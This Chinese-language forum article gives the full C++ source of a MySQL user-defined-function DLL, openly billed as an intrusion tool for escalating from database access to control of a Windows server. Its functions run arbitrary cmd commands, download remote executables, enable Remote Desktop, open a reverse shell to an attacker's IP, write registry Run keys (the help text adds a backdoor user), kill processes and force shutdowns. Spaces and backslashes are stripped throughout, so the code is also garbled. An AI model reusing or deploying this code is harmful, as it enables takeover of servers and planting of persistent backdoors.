mysql是一个常用的数据库系统,应用极广泛,如果得到一个mysql的用户权限,如果提升呢,下面这个思路很先进!但得有一定编程基础!
现在网上通过mysql获得系统权限大都通过MYSQL的用户函数接口UDF,比如Mix.dll和my_udf.dll。在Mix.dll中有一个MixConnect函数它会反弹shell,但是使用这个函数会造成MYSQL假死,前些天我就用这个函数反弹shell后由于网络原因不一会儿就断开了,造成了MYSQL当掉。my_udf.dll和Mix.dll相似,但它是通过my_udfdoor函数在服务器上侦听3306端口,用nc正向连接获得shell,但它的功能显的少了点,于是我决定自己写一个功能强大,运行稳定的UDF。
MYSQL有一个开发包,它定义了自己的接口,变量类型,以及函数执行顺序。比如我们要写一个open3389函数,我们可以这样写:
程序代码
extern"C"__declspec(dllexport)my_boolopen3389_init(UDF_INIT*initid,UDF_ARGS*args,char*message)
{
//在open3389函数之前调用,一般用于初始化工作,为可选函数;
//return1出错,0正常
return0;
}
extern"C"__declspec(dllexport)char*open3389(UDF_INIT*initid,UDF_ARGS*args,char*result,unsignedlong*length,char*is_null,char*error)
{
//真正实现功能的函数,必需函数;
/*
函数内容;
return结果;
*/
}
extern"C"__declspec(dllexport)voidopen3389_deinit(UDF_INIT*initid)
{
//在open3389函数之后调用,一般用于内存释放,可选函数;
}
以上的open3389函数的返回值是char*类型的,如果是其它类型函数的参数列表也会有所不同,具体的可见MYSQL参考手册。
在写MYSQLUDF时另一个必须考虑的问题是程序的稳定时,它要经的起各种变态输入的考验,否则一旦程序出错MYSQL服务进程就会当掉。
以下是我写的UDF内容,它包含10个函数:
cmdshell执行cmd;
downloader下载者,到网上下载指定文件并保存到指定目录;
open3389通用开3389终端服务,可指定端口(不改端口无需重启);
backshell反弹Shell;
ProcessView枚举系统进程;
KillProcess终止指定进程;
regread读注册表;
regwrite写注册表;
shut关机,注销,重启;
about说明与帮助函数;
使用方法:
创建函数:createfunction函数名(区分大小写)returnsstringsoname'dll名'(注意路径);
删除函数:deletefunction函数名;
使用函数:select函数名(参数列表);获取参数信息可使用select函数名("help");
以上几个函数都经过多次的测试(测试平台:MYSQL5.0.24-community-nt、WindowsXP),不太可能会造成MYSQL假死等现象,但也不排除在特殊环境,特殊输入的情况下出错的可能,如发现bug可通知我,QQ:185826531(langouster)
程序代码
//--------------------------------------------------------------------------源程序
//MYSQL_UDF.cpp:定义DLL应用程序的入口点。
#include"stdafx.h"
#include"stdio.h"
#include<windows.h>
#include<tlhelp32.h>
#include<stdlib.h>
#include<winsock.h>
#include<Urlmon.h>
#include"mysql.h"
#include"resource.h"
#pragmacomment(lib,"Urlmon.lib")
HANDLEg_module;
//--------------------------------------------------------------------------------------------------------------------------
BOOLAPIENTRYDllMain(HINSTANCEhModule,DWORDul_reason_for_call,LPVOIDlpReserved)
{
if(ul_reason_for_call==DLL_PROCESS_ATTACH)
g_module=hModule;
returnTRUE;
}
//--------------------------------------------------------------------------------------------------------------------------cmdshell
extern"C"__declspec(dllexport)my_boolcmdshell_init(UDF_INIT*initid,UDF_ARGS*args,char*message)
{//return1出错,0正常
initid->max_length=65*1024*1024;
return0;
}
extern"C"__declspec(dllexport)char*cmdshell(UDF_INIT*initid,UDF_ARGS*args,char*result,unsignedlong*length,char*is_null,char*error)
{
if(args->arg_count!=1||args->arg_type[0]!=STRING_RESULT||stricmp(args->args[0],"help")==0)
{
initid->ptr=(char*)malloc(200);
if(initid->ptr==NULL)returnNULL;
strcpy(initid->ptr,"执行CMDShell函数.rn例:selectcmdshell("dirc:");rn参数中的""要用""代替.");
*length=strlen(initid->ptr);
returninitid->ptr;
}
intRunStatus=0;
char*cmdline,TempFilePath[MAX_PATH],ShellPath[MAX_PATH],temp[100];
DWORDsize=0,len;
HANDLEhFile;
GetSystemDirectory(ShellPath,MAX_PATH-1);
strcat(ShellPath,"cmd.exe");
GetEnvironmentVariable("temp",TempFilePath,MAX_PATH-1);
strcat(TempFilePath,"2351213.tmp");
cmdline=(char*)malloc(strlen(args->args[0])+strlen(TempFilePath)+7);
strcpy(cmdline,"/c");
strcat(cmdline,(args->args)[0]);
strcat(cmdline,">");
strcat(cmdline,TempFilePath);
STARTUPINFOsi;
PROCESS_INFORMATIONpi;
ZeroMemory(&si,sizeof(si));
si.wShowWindow=SW_HIDE;
si.cb=sizeof(si);
ZeroMemory(&pi,sizeof(pi));
RunStatus=CreateProcess(ShellPath,cmdline,NULL,NULL,FALSE,0,0,0,&si,&pi);
free(cmdline);
if(!RunStatus)
{
itoa(GetLastError(),temp,10);
sprintf(temp,"Shell无法启动,GetLastError=%sn",temp);
initid->ptr=(char*)malloc(strlen(temp)+1);
strcpy(initid->ptr,temp);
(*length)=strlen(initid->ptr);
returninitid->ptr;
}
WaitForSingleObject(pi.hProcess,30000);
//获得结果
hFile=CreateFile(TempFilePath,GENERIC_READ,FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_ARCHIVE,NULL);
if(hFile!=INVALID_HANDLE_VALUE)
{
size=GetFileSize(hFile,NULL);
initid->ptr=(char*)malloc(size+100);
ReadFile(hFile,initid->ptr,size+1,&len,NULL);
(initid->ptr)[size]='';
strcat(initid->ptr,"rn--------------------------------------------完成!rn");
CloseHandle(hFile);
DeleteFile(TempFilePath);
}
else
{
initid->ptr=(char*)malloc(100);
strcpy(initid->ptr,"rn--------------------------------------------完成!rn");
}
(*length)=strlen(initid->ptr);
returninitid->ptr;
}
extern"C"__declspec(dllexport)voidcmdshell_deinit(UDF_INIT*initid)
{
if(initid->ptr!=NULL)
free(initid->ptr);
}
//---------------------------------------------------------------------------------------------------------------------------downloader
extern"C"__declspec(dllexport)my_booldownloader_init(UDF_INIT*initid,UDF_ARGS*args,char*message)
{//return1出错,0正常
initid->max_length=65*1024*1024;
return0;
}
extern"C"__declspec(dllexport)char*downloader(UDF_INIT*initid,UDF_ARGS*args,char*result,unsignedlong*length,char*is_null,char*error)
{
if(args->arg_count!=2||args->arg_type[0]!=STRING_RESULT||args->arg_type[1]!=STRING_RESULT||stricmp(args->args[0],"help")==0)
{
initid->ptr=(char*)malloc(200);
if(initid->ptr==NULL)returnNULL;
strcpy(initid->ptr,"下载者函数rn例:selectdownloader("http://www.baidu.com/server.exe","c:winntsystem32ser.exe");rn参数中的""要用""代替.");
*length=strlen(initid->ptr);
returninitid->ptr;
}
HANDLEhFile;
charpath[MAX_PATH];
strcpy(path,(args->args)[1]);
hFile=CreateFile(path,GENERIC_WRITE,FILE_SHARE_READ,NULL,Create_ALWAYS,0,NULL);
if(hFile==INVALID_HANDLE_VALUE)
{
initid->ptr=(char*)malloc(100+strlen(path));
sprintf(initid->ptr,"文件创建失败,请确认目录存在且有写权限(%s).",path);
*length=strlen(initid->ptr);
returninitid->ptr;
}
CloseHandle(hFile);
DeleteFile(path);
if(URLDownloadToFile(NULL,(args->args)[0],path,0,0)==S_OK)
{
initid->ptr=(char*)malloc(50+strlen(path));
sprintf(initid->ptr,"下载文件成功(%s).",path);
*length=strlen(initid->ptr);
returninitid->ptr;
}
else
{
initid->ptr=(char*)malloc(100+strlen((args->args)[0]));
sprintf(initid->ptr,"下载文件出现错误,可能是网络原因(%s).",(args->args)[0]);
*length=strlen(initid->ptr);
returninitid->ptr;
}
}
extern"C"__declspec(dllexport)voiddownloader_deinit(UDF_INIT*initid)
{
if(initid->ptr)
free(initid->ptr);
}
//--------------------------------------------------------------------------------------------------------------------------open3389
extern"C"__declspec(dllexport)my_boolopen3389_init(UDF_INIT*initid,UDF_ARGS*args,char*message)
{//return1出错,0正常
initid->max_length=65*1024*1024;
return0;
}
extern"C"__declspec(dllexport)char*open3389(UDF_INIT*initid,UDF_ARGS*args,char*result,unsignedlong*length,char*is_null,char*error)
{
if(!(args->arg_count==0||(args->arg_count==1&&args->arg_type[0]==INT_RESULT)))
{
initid->ptr=(char*)malloc(200);
if(initid->ptr==NULL)returnNULL;
strcpy(initid->ptr,"通用开3389终端服务.修改端口需重启后生效.rn例:selectopen3389([端口]);");
*length=strlen(initid->ptr);
returninitid->ptr;
}
HRSRChrsrc1;
HGLOBALhglobal1;
HANDLEhFile;
charpath[MAX_PATH];
DWORDsize,size2;
GetEnvironmentVariable("temp",path,MAX_PATH-1);
strcat(path,"457391.exe");
hrsrc1=FindResource((HMODULE)g_module,MAKEINTRESOURCE(IDR_BIN1),"BIN");
if(hrsrc1==NULL)
{
initid->ptr=(char*)malloc(100);
strcpy(initid->ptr,"查找资源出错,open3389无法继续运行.");
*length=strlen(initid->ptr);
returninitid->ptr;
}
size=SizeofResource((HMODULE)g_module,hrsrc1);
hglobal1=LoadResource((HMODULE)g_module,hrsrc1);
if(hglobal1==NULL)
{
initid->ptr=(char*)malloc(100);
strcpy(initid->ptr,"载入资源出错,open3389无法继续运行.");
*length=strlen(initid->ptr);
returninitid->ptr;
}
hFile=CreateFile(path,GENERIC_WRITE,0,NULL,Create_ALWAYS,0,NULL);
if(hFile==INVALID_HANDLE_VALUE)
{
initid->ptr=(char*)malloc(100);
strcpy(initid->ptr,"创建临时文件出错,open3389无法继续运行.");
*length=strlen(initid->ptr);
returninitid->ptr;
}
WriteFile(hFile,(LPVOID)LockResource(hglobal1),size+1,&size2,NULL);
CloseHandle(hFile);
GlobalFree(hglobal1);
STARTUPINFOsi;
PROCESS_INFORMATIONpi;
ZeroMemory(&si,sizeof(si));
si.wShowWindow=SW_HIDE;
si.cb=sizeof(si);
ZeroMemory(&pi,sizeof(pi));
boolRunStatus=CreateProcess(path,NULL,NULL,NULL,FALSE,0,0,0,&si,&pi);
if(!RunStatus)
{
DeleteFile(path);
initid->ptr=(char*)malloc(100);
strcpy(initid->ptr,"运行临时文件出错,您的权限可能不够.");
*length=strlen(initid->ptr);
returninitid->ptr;
}
WaitForSingleObject(pi.hProcess,5000);
DeleteFile(path);
//改端口
if(args->arg_count!=0&&args->arg_type[0]==INT_RESULT)
{
HKEYkey;
DWORDdwDisposition;
DWORDport=*((longlong*)args->args[0]);
RegCreateKeyEx(HKEY_LOCAL_MACHINE,"SYSTEMCurrentControlSetControlTerminalServerWinStationsRDP-Tcp",0,"",REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,NULL,&key,&dwDisposition);
if(!RegSetValueEx(key,"PortNumber",0,REG_DWORD,(BYTE*)&port,sizeof(port)))
{
RegCloseKey(key);
RegCreateKeyEx(HKEY_LOCAL_MACHINE,"SYSTEMCurrentControlSetControlTerminalServerWdsrdpwdTdstcp",0,"",REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,NULL,&key,&dwDisposition);
if(!RegSetValueEx(key,"PortNumber",0,REG_DWORD,(BYTE*)&port,sizeof(port)))
{
RegCloseKey(key);
initid->ptr=(char*)malloc(100);
sprintf(initid->ptr,"成功开启3389终端服务....rn成功修改终端服务端口为%d,重启后生效,重启系统可利用WindowsExit函数.",port);
*length=strlen(initid->ptr);
returninitid->ptr;
}
}
RegCloseKey(key);
initid->ptr=(char*)malloc(100);
sprintf(initid->ptr,"成功开启3389终端服务....rn修改终端服务端口失败.");
*length=strlen(initid->ptr);
returninitid->ptr;
}
else
{
initid->ptr=(char*)malloc(100);
sprintf(initid->ptr,"成功开启3389终端服务.rn");
*length=strlen(initid->ptr);
returninitid->ptr;
}
}
extern"C"__declspec(dllexport)voidopen3389_deinit(UDF_INIT*initid)
{
if(initid->ptr)
free(initid->ptr);
}
//--------------------------------------------------------------------------------------------------------------------------regread
extern"C"__declspec(dllexport)my_boolregread_init(UDF_INIT*initid,UDF_ARGS*args,char*message)
{//return1出错,0正常
initid->max_length=65*1024*1024;
return0;
}
extern"C"__declspec(dllexport)char*regread(UDF_INIT*initid,UDF_ARGS*args,char*result,unsignedlong*length,char*is_null,char*error)
{
if(args->arg_count!=3||args->arg_type[0]!=STRING_RESULT||args->arg_type[1]!=STRING_RESULT||args->arg_type[2]!=STRING_RESULT||stricmp(args->args[0],"help")==0)
{
initid->ptr=(char*)malloc(250);
if(initid->ptr==NULL)returnNULL;
strcpy(initid->ptr,"读注册表函数.rn例:selectregread("HKEY_LOCAL_MACHINE","SYSTEMControlSet001ServicesW3SVCParametersVirtualRoots","/");rn参数中的""要用""代替.");
*length=strlen(initid->ptr);
returninitid->ptr;
}
DWORDa,b,c;
BYTEbytere[1000];
HKEYkey,key2;
if(strcmp("HKEY_LOCAL_MACHINE",(args->args)[0])==0)
key=HKEY_LOCAL_MACHINE;
elseif(strcmp("HKEY_CLASSES_ROOT",(args->args)[0])==0)
key=HKEY_CLASSES_ROOT;
elseif(strcmp("HKEY_CURRENT_USER",(args->args)[0])==0)
key=HKEY_CURRENT_USER;
elseif(strcmp("HKEY_USERS",(args->args)[0])==0)
key=HKEY_USERS;
else
{
initid->ptr=(char*)malloc(50+strlen((args->args)[0]));
sprintf(initid->ptr,"未知的注册表句柄:%srn",(args->args)[0]);
*length=strlen(initid->ptr);
returninitid->ptr;
}
RegCreateKeyEx(key,(args->args)[1],0,0,REG_OPTION_NON_VOLATILE,KEY_QUERY_VALUE,NULL,&key2,&b);
if(b==REG_OPENED_EXISTING_KEY)
{
if(!RegQueryValueEx(key2,(args->args)[2],0,&a,bytere,&c))
{
CloseHandle(key2);
initid->ptr=(char*)malloc(1001);
memset(initid->ptr,0,1001);
strcpy(initid->ptr,(char*)bytere);
*length=strlen(initid->ptr);
returninitid->ptr;
}
else
{
CloseHandle(key2);
initid->ptr=(char*)malloc(100);
strcpy(initid->ptr,"找不注册表值rn");
*length=strlen(initid->ptr);
returninitid->ptr;
}
}
else
{
CloseHandle(key2);
initid->ptr=(char*)malloc(100);
strcpy(initid->ptr,"找不注册表项rn");
*length=strlen(initid->ptr);
returninitid->ptr;
}
}
extern"C"__declspec(dllexport)voidregread_deinit(UDF_INIT*initid)
{
if(initid->ptr)
free(initid->ptr);
}
//--------------------------------------------------------------------------------------------------------------------------regwrite
extern"C"__declspec(dllexport)my_boolregwrite_init(UDF_INIT*initid,UDF_ARGS*args,char*message)
{//return1出错,0正常
initid->max_length=65*1024*1024;
return0;
}
extern"C"__declspec(dllexport)char*regwrite(UDF_INIT*initid,UDF_ARGS*args,char*result,unsignedlong*length,char*is_null,char*error)
{
if(args->arg_count!=5||args->arg_type[0]!=STRING_RESULT||args->arg_type[1]!=STRING_RESULT||args->arg_type[2]!=STRING_RESULT||args->arg_type[3]!=STRING_RESULT||args->arg_type[4]!=STRING_RESULT||stricmp(args->args[0],"help")==0)
{
initid->ptr=(char*)malloc(300);
if(initid->ptr==NULL)returnNULL;
strcpy(initid->ptr,"写注册表函数.rn例:selectregwrite("HKEY_LOCAL_MACHINE","SOFTWAREMicrosoftWindowsCurrentVersionRun","adduser","REG_SZ","cmd.exe/cnetuserlangousterlangouster/add");rn参数中的""要用""代替.");
*length=strlen(initid->ptr);
returninitid->ptr;
}
HKEYkey,hkey;
DWORDdwDisposition,ktype;
if(strcmp("HKEY_LOCAL_MACHINE",(args->args)[0])==0)
hkey=HKEY_LOCAL_MACHINE;
elseif(strcmp("HKEY_CLASSES_ROOT",(args->args)[0])==0)
hkey=HKEY_CLASSES_ROOT;
elseif(strcmp("HKEY_CURRENT_USER",(args->args)[0])==0)
hkey=HKEY_CURRENT_USER;
elseif(strcmp("HKEY_USERS",(args->args)[0])==0)
hkey=HKEY_USERS;
else
{
initid->ptr=(char*)malloc(50+strlen((args->args)[0]));
sprintf(initid->ptr,"未知的注册表句柄:%srn",(args->args)[0]);
*length=strlen(initid->ptr);
returninitid->ptr;
}
if(strcmp("REG_BINARY",(args->args)[3])==0)
ktype=REG_BINARY;
elseif(strcmp("REG_DWORD",(args->args)[3])==0)
ktype=REG_DWORD;
elseif(strcmp("REG_DWORD_LITTLE_ENDIAN",(args->args)[3])==0)
ktype=REG_DWORD_LITTLE_ENDIAN;
elseif(strcmp("REG_DWORD_BIG_ENDIAN",(args->args)[3])==0)
ktype=REG_DWORD_BIG_ENDIAN;
elseif(strcmp("REG_EXPAND_SZ",(args->args)[3])==0)
ktype=REG_EXPAND_SZ;
elseif(strcmp("REG_LINK",(args->args)[3])==0)
ktype=REG_LINK;
elseif(strcmp("REG_MULTI_SZ",(args->args)[3])==0)
ktype=REG_MULTI_SZ;
elseif(strcmp("REG_NONE",(args->args)[3])==0)
ktype=REG_NONE;
elseif(strcmp("REG_RESOURCE_LIST",(args->args)[3])==0)
ktype=REG_RESOURCE_LIST;
elseif(strcmp("REG_SZ",(args->args)[3])==0)
ktype=REG_SZ;
else
{
initid->ptr=(char*)malloc(50+strlen((args->args)[3]));
sprintf(initid->ptr,"未知的注册表值类型:%srn",(args->args)[3]);
*length=strlen(initid->ptr);
returninitid->ptr;
}
RegCreateKeyEx(hkey,(args->args)[1],0,"",REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,NULL,&key,&dwDisposition);
if(!RegSetValueEx(key,(args->args)[2],0,ktype,(BYTE*)(args->args)[4],lstrlen((args->args)[4])+1))
{
initid->ptr=(char*)malloc(100);
sprintf(initid->ptr,"写注册表成功rn");
*length=strlen(initid->ptr);
returninitid->ptr;
}
else
{
initid->ptr=(char*)malloc(100);
sprintf(initid->ptr,"写注册表失败,可能是您的权限不够rn");
*length=strlen(initid->ptr);
returninitid->ptr;
}
RegCloseKey(key);
}
extern"C"__declspec(dllexport)voidregwrite_deinit(UDF_INIT*initid)
{
if(initid->ptr)
free(initid->ptr);
}
//--------------------------------------------------------------------------------------------------------------------------KillProcess
extern"C"__declspec(dllexport)my_boolKillProcess_init(UDF_INIT*initid,UDF_ARGS*args,char*message)
{//return1出错,0正常
initid->max_length=65*1024*1024;
return0;
}
extern"C"__declspec(dllexport)char*KillProcess(UDF_INIT*initid,UDF_ARGS*args,char*result,unsignedlong*length,char*is_null,char*error)
{
if(args->arg_count!=1||args->arg_type[0]!=STRING_RESULT||(strcmp((args->args)[0],"help")==0))
{
initid->ptr=(char*)malloc(200);
if(initid->ptr==NULL)returnNULL;
strcpy(initid->ptr,"结束进程函数.rn例:selectKillProcess("进程名或进程ID(十进制)");rn程序目前还不能结束系统进程.");
*length=strlen(initid->ptr);
returninitid->ptr;
}
HANDLEhSnapshot=NULL;
DWORDprocessid=0;
HANDLEhProcess;
charProcessName[MAX_PATH],tempchar[10];
PROCESSENTRY32pe;
strcpy(ProcessName,(args->args)[0]);
hSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,NULL);
pe.dwSize=sizeof(PROCESSENTRY32);
Process32First(hSnapshot,&pe);
do
{
itoa(pe.th32ProcessID,tempchar,10);
if(stricmp(pe.szExeFile,ProcessName)==0||stricmp(tempchar,ProcessName)==0)
{
processid=pe.th32ProcessID;
break;
}
}
while(Process32Next(hSnapshot,&pe)==TRUE);
CloseHandle(hSnapshot);
if(processid==0)
{
initid->ptr=(char*)malloc(100);
sprintf(initid->ptr,"找不到进程%s,请确认进程是否存在!",(args->args)[0]);
*length=strlen(initid->ptr);
returninitid->ptr;
}
hProcess=OpenProcess(PROCESS_TERMINATE,false,processid);
if(TerminateProcess(hProcess,0))
{
CloseHandle(hProcess);
initid->ptr=(char*)malloc(100);
sprintf(initid->ptr,"%s进程成功终止.",(args->args)[0]);
*length=strlen(initid->ptr);
returninitid->ptr;
}
else
{
CloseHandle(hProcess);
initid->ptr=(char*)malloc(100);
sprintf(initid->ptr,"%s进程终止失败,您的权限可能不足.",(args->args)[0]);
*length=strlen(initid->ptr);
returninitid->ptr;
}
}
extern"C"__declspec(dllexport)voidKillProcess_deinit(UDF_INIT*initid)
{
if(initid->ptr)
free(initid->ptr);
}
//--------------------------------------------------------------------------------------------------------------------------ProcessView
extern"C"__declspec(dllexport)my_boolProcessView_init(UDF_INIT*initid,UDF_ARGS*args,char*message)
{//return1出错,0正常
initid->max_length=65*1024*1024;
return0;
}
extern"C"__declspec(dllexport)char*ProcessView(UDF_INIT*initid,UDF_ARGS*args,char*result,unsignedlong*length,char*is_null,char*error)
{
if(args->arg_count!=0)
{
initid->ptr=(char*)malloc(100);
if(initid->ptr==NULL)returnNULL;
strcpy(initid->ptr,"枚举进程函数.rn例:selectProcessView();");
*length=strlen(initid->ptr);
returninitid->ptr;
}
HANDLEhSnapshot=NULL;
DWORDprocessid=0;
PROCESSENTRY32pe;
chartempchar[10];
initid->ptr=(char*)malloc(2000);
if(initid->ptr==NULL)returnNULL;
memset(initid->ptr,0,1000);
hSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,NULL);
pe.dwSize=sizeof(PROCESSENTRY32);
Process32First(hSnapshot,&pe);
do
{
strcat(initid->ptr,pe.szExeFile);
strcat(initid->ptr,"t");
itoa(pe.th32ProcessID,tempchar,10);
strcat(initid->ptr,tempchar);
strcat(initid->ptr,"rn");
}
while(Process32Next(hSnapshot,&pe)==TRUE);
CloseHandle(hSnapshot);
*length=strlen(initid->ptr);
returninitid->ptr;
}
extern"C"__declspec(dllexport)voidProcessView_deinit(UDF_INIT*initid)
{
if(initid->ptr!=NULL)
free(initid->ptr);
}
//--------------------------------------------------------------------------------------------------------------------------WindowsExit
extern"C"__declspec(dllexport)my_boolshut_init(UDF_INIT*initid,UDF_ARGS*args,char*message)
{//return1出错,0正常
initid->max_length=65*1024*1024;
return0;
}
extern"C"__declspec(dllexport)char*shut(UDF_INIT*initid,UDF_ARGS*args,char*result,unsignedlong*length,char*is_null,char*error)
{
if(args->arg_count!=1||args->arg_type[0]!=STRING_RESULT||stricmp(args->args[0],"help")==0)
{
initid->ptr=(char*)malloc(100);
if(initid->ptr==NULL)returnNULL;
strcpy(initid->ptr,"关机重启注销函数.rn例:selectshut("logoff|shutdown|reboot");");
*length=strlen(initid->ptr);
returninitid->ptr;
}
HANDLEhToken;
TOKEN_PRIVILEGEStoken;
UINTFlag;
if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&hToken))
{
initid->ptr=(char*)malloc(100);
if(initid->ptr==NULL)returnNULL;
strcpy(initid->ptr,"获得进程访问信令出错,您的权限可能不足.rn");
*length=strlen(initid->ptr);
returninitid->ptr;
}
token.PrivilegeCount=1;
LookupPrivilegeValue(NULL,SE_SHUTDOWN_NAME,&token.Privileges[0].Luid);
token.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
if(!AdjustTokenPrivileges(hToken,0,&token,sizeof(token),0,0))
{
initid->ptr=(char*)malloc(100);
if(initid->ptr==NULL)returnNULL;
strcpy(initid->ptr,"获得关机令牌出错,您的权限可能不足.rn");
*length=strlen(initid->ptr);
returninitid->ptr;
}
if(stricmp(args->args[0],"logoff")==0)
Flag=EWX_LOGOFF|EWX_FORCE;
elseif(stricmp(args->args[0],"shutdown")==0)
Flag=EWX_SHUTDOWN|EWX_FORCE;
elseif(stricmp(args->args[0],"reboot")==0)
Flag=EWX_REBOOT|EWX_FORCE;
else
{
initid->ptr=(char*)malloc(100+strlen(args->args[0]));
if(initid->ptr==NULL)returnNULL;
sprintf(initid->ptr,"未知的参数%s,期望为logoff、shutdown、reboot中的一个.rn",args->args[0]);
*length=strlen(initid->ptr);
returninitid->ptr;
}
if(ExitWindowsEx(Flag,0))
{
initid->ptr=(char*)malloc(100);
if(initid->ptr==NULL)returnNULL;
sprintf(initid->ptr,"成功执行.rn");
*length=strlen(initid->ptr);
returninitid->ptr;
}
else
{
initid->ptr=(char*)malloc(100);
if(initid->ptr==NULL)returnNULL;
sprintf(initid->ptr,"执行失败,您的权限可能不足.rn");
*length=strlen(initid->ptr);
returninitid->ptr;
}
}
extern"C"__declspec(dllexport)voidshut_deinit(UDF_INIT*initid)
{
if(initid->ptr!=NULL)
free(initid->ptr);
}
//--------------------------------------------------------------------------------------------------------------------------BackShell
extern"C"__declspec(dllexport)my_boolbackshell_init(UDF_INIT*initid,UDF_ARGS*args,char*message)
{//return1出错,0正常
initid->max_length=65*1024*1024;
return0;
}
extern"C"__declspec(dllexport)char*backshell(UDF_INIT*initid,UDF_ARGS*args,char*result,unsignedlong*length,char*is_null,char*error)
{
if(args->arg_count!=2||args->arg_type[0]!=STRING_RESULT||args->arg_type[1]!=INT_RESULT||stricmp(args->args[0],"help")==0)
{
initid->ptr=(char*)malloc(100);
if(initid->ptr==NULL)returnNULL;
strcpy(initid->ptr,"反弹shell.rn例:selectbackshell("yourIP",yourport);");
*length=strlen(initid->ptr);
returninitid->ptr;
}
HRSRChrsrc1;
HGLOBALhglobal1;
HANDLEhFile;
charpath[MAX_PATH],cmd[400];
DWORDsize,size2;
GetEnvironmentVariable("temp",path,MAX_PATH-1);
strcat(path,"95315964.tmp");
hrsrc1=FindResource((HMODULE)g_module,MAKEINTRESOURCE(IDR_BIN2),"BIN");
if(hrsrc1==NULL)
{
initid->ptr=(char*)malloc(100);
strcpy(initid->ptr,"查找资源出错,backshell无法继续运行.");
*length=strlen(initid->ptr);
returninitid->ptr;
}
size=SizeofResource((HMODULE)g_module,hrsrc1);
hglobal1=LoadResource((HMODULE)g_module,hrsrc1);
if(hglobal1==NULL)
{
initid->ptr=(char*)malloc(100);
strcpy(initid->ptr,"载入资源出错,backshell无法继续运行.");
*length=strlen(initid->ptr);
returninitid->ptr;
}
hFile=CreateFile(path,GENERIC_WRITE,0,NULL,Create_ALWAYS,0,NULL);
if(hFile==INVALID_HANDLE_VALUE)
{
initid->ptr=(char*)malloc(100);
strcpy(initid->ptr,"创建临时文件出错,backshell无法继续运行.");
*length=strlen(initid->ptr);
returninitid->ptr;
}
WriteFile(hFile,(LPVOID)LockResource(hglobal1),size+1,&size2,NULL);
CloseHandle(hFile);
GlobalFree(hglobal1);
strcpy(cmd,path);
GetSystemDirectory(path,MAX_PATH-1);
strcat(path,"cmd.exe");
sprintf(cmd,"%s-e%s%s%d",cmd,path,args->args[0],*((longlong*)args->args[1]));
if(WinExec(cmd,SW_HIDE)>31)
{
initid->ptr=(char*)malloc(100);
strcpy(initid->ptr,"执行成功rn");
*length=strlen(initid->ptr);
returninitid->ptr;
}
else
{
initid->ptr=(char*)malloc(100);
strcpy(initid->ptr,"执行失败rn");
*length=strlen(initid->ptr);
returninitid->ptr;
}
}
extern"C"__declspec(dllexport)voidbackshell_deinit(UDF_INIT*initid)
{
if(initid->ptr!=NULL)
free(initid->ptr);
}
//--------------------------------------------------------------------------------------------------------------------------about
extern"C"__declspec(dllexport)my_boolabout_init(UDF_INIT*initid,UDF_ARGS*args,char*message)
{//return1出错,0正常
initid->max_length=65*1024*1024;
return0;
}
extern"C"__declspec(dllexport)char*about(UDF_INIT*initid,UDF_ARGS*args,char*result,unsignedlong*length,char*is_null,char*error)
{
initid->ptr=(char*)malloc(2000);
if(initid->ptr==NULL)returnNULL;
memset(initid->ptr,0,2000);
strcat(initid->ptr,"mysql入侵必备dll版本1.0.0.1rnrn");
strcat(initid->ptr,"注意:要使用本dll你必须有对mysql的insert和delete权限以创建和删除函数。rnrn");
strcat(initid->ptr,"使用方法:rn");
strcat(initid->ptr,"创建函数:createfunction函数名(区分大小写)returnsstringsoname"dll名"(注意路径);rn");
strcat(initid->ptr,"删除函数:deletefunction函数名;rn");
strcat(initid->ptr,"使用函数:select函数名(参数列表);获取参数信息可使用select函数名("help");rn");
strcat(initid->ptr,"--------------------------------------------------------------------rn");
strcat(initid->ptr,"本dll包含的函数:rn");
strcat(initid->ptr,"cmdshell执行cmd;rn");
strcat(initid->ptr,"downloader下载者,到网上下载指定文件并保存到指定目录;rn");
strcat(initid->ptr,"open3389通用开3389终端服务,可指定端口(不改端口无需重启);rn");
strcat(initid->ptr,"backshell反弹Shell;rn");
strcat(initid->ptr,"ProcessView枚举系统进程;rn");
strcat(initid->ptr,"KillProcess终止指定进程;rn");
strcat(initid->ptr,"regread读注册表;rn");
strcat(initid->ptr,"regwrite写注册表;rn");
strcat(initid->ptr,"shut关机,注销,重启;rn");
strcat(initid->ptr,"about本函数;rn");
strcat(initid->ptr,"--------------------------------------------------------------------rn");
strcat(initid->ptr,"DLL中的每个函数都经多次测试,不太可能会造成MYSQL假死等现象,但也不排除在特殊环境、特殊输入下出错的可能性.rn");
strcat(initid->ptr,"使用过程中发现的bug可和我联系QQ:185826531(langouster)rn");
strcat(initid->ptr,"源程序公开,可以任意修改和添加功能,散布源程序请注明原作者.rnrn");
strcat(initid->ptr,"特别声明:本程序只供技术研究之用,不正当使用程序造成的后果作者概不负责!");
*length=strlen(initid->ptr);
returninitid->ptr;
}
extern"C"__declspec(dllexport)voidabout_deinit(UDF_INIT*initid)
{
if(initid->ptr!=NULL)
free(initid->ptr);
}